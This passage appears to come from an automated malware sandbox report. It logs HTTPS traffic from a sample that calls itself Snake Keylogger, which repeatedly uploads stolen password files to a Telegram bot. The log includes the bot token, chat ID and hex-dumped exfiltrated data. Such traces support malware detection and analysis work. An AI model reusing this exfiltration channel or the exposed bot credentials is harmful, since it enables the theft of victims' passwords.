                                                                    2022-06-26 07:34:01 UTC326OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 39 63 63 63 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757059ccc9dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:01 UTC326INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:01 UTC327INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66965,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228841,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    194192.168.2.550074149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:01 UTC327OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575705d140a8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:01 UTC327OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 64 31 34 30 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575705d140a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:01 UTC328INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:01 UTC328INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66966,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228841,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    195192.168.2.550077149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:01 UTC329OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757060f3d38
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:01 UTC329OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 30 66 33 64 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757060f3d38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:02 UTC330INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:02 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:02 UTC330INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66967,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    196192.168.2.550079149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:02 UTC330OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757064d3a4a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 34 64 33 61 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757064d3a4aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:02 UTC331INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:02 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:02 UTC332INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66968,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    197192.168.2.550080149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:02 UTC332OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570688d784
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:02 UTC333OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 38 38 64 37 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570688d784Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:03 UTC333INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:02 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:03 UTC333INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66969,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    198192.168.2.550082149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:03 UTC334OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575706c6d31c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:03 UTC334OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 63 36 64 33 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575706c6d31cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:03 UTC335INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:03 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:03 UTC335INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66970,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228843,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    199192.168.2.550084149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:03 UTC336OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575707026da8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:03 UTC336OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 30 32 36 64 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575707026da8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:03 UTC336INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:03 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:03 UTC337INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66971,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228843,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.549770149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:39 UTC3OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d4bc2909
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
